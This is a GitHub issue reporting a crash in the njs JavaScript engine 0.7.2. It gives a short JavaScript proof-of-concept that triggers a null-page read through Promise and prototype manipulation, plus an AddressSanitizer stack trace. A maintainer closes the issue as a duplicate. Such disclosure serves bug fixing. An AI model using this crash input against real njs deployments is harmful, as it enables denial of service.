Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SEGV njs_function.c:443:13 in njs_function_lambda_frame #484

Closed
Q1IQ opened this issue Mar 2, 2022 · 1 comment
Closed

SEGV njs_function.c:443:13 in njs_function_lambda_frame #484

Q1IQ opened this issue Mar 2, 2022 · 1 comment
Labels
duplicate

Comments

@Q1IQ
Copy link

Q1IQ commented Mar 2, 2022

Environment

OS      : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit  : f65981b0b8fcf02d69a40bc934803c25c9f607ab
Version : 0.7.2
Build   : 
          NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
          NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"

Proof of concept

function main() {
function a0(a1) {
    const a2 = {};
    const a3 = a2.__proto__;
    const a4 = {};
    const a5 = a4[8];
    function a6(a7,a8) {
        a3.toString = a8;
    }
    const a9 = a6(a5,a6);
    const a12 = "includes"[{}]();
}
const a17 = new Promise(a0);
const a19 = a17["then"](a0,a0);
}
main();

Stack dump

AddressSanitizer:DEADLYSIGNAL
=================================================================
==732131==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000883 (pc 0x00000053a900 bp 0x7ffe73bf2d30 sp 0x7ffe73bf2ca0 T0)
==732131==The signal is caused by a READ memory access.
==732131==Hint: address points to the zero page.
    #0 0x53a900 in njs_function_lambda_frame /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.c:443:13
    #1 0x53acef in njs_function_frame /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.h:155:16
    #2 0x53acef in njs_function_call2 /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.c:595:11
    #3 0x5f45b7 in njs_function_call /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.h:180:12
    #4 0x5f45b7 in njs_promise_reaction_job /home/q1iq/Documents/origin/njs_f65981b/src/njs_promise.c:1171:15
    #5 0x53c9ec in njs_function_native_call /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.c:739:11
    #6 0x4deb20 in njs_vm_invoke /home/q1iq/Documents/origin/njs_f65981b/src/njs_vm.c:440:12
    #7 0x4deb20 in njs_vm_call /home/q1iq/Documents/origin/njs_f65981b/src/njs_vm.c:424:12
    #8 0x4deb20 in njs_vm_handle_events /home/q1iq/Documents/origin/njs_f65981b/src/njs_vm.c:584:19
    #9 0x4deb20 in njs_vm_run /home/q1iq/Documents/origin/njs_f65981b/src/njs_vm.c:544:12
    #10 0x4c82d7 in njs_process_script /home/q1iq/Documents/origin/njs_f65981b/src/njs_shell.c:924:15
    #11 0x4c73a1 in njs_process_file /home/q1iq/Documents/origin/njs_f65981b/src/njs_shell.c:619:11
    #12 0x4c73a1 in main /home/q1iq/Documents/origin/njs_f65981b/src/njs_shell.c:303:15
    #13 0x7fc3c967e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #14 0x41dabd in _start (/home/q1iq/Documents/origin/njs_f65981b/build/njs+0x41dabd)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.c:443:13 in njs_function_lambda_frame
==732131==ABORTING

Credit

Q1IQ(@Q1IQ)
@xeioex
Copy link
Contributor

xeioex commented Apr 6, 2022

Duplicate of #467.

@xeioex xeioex closed this as completed Apr 6, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
duplicate
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@xeioex @Q1IQ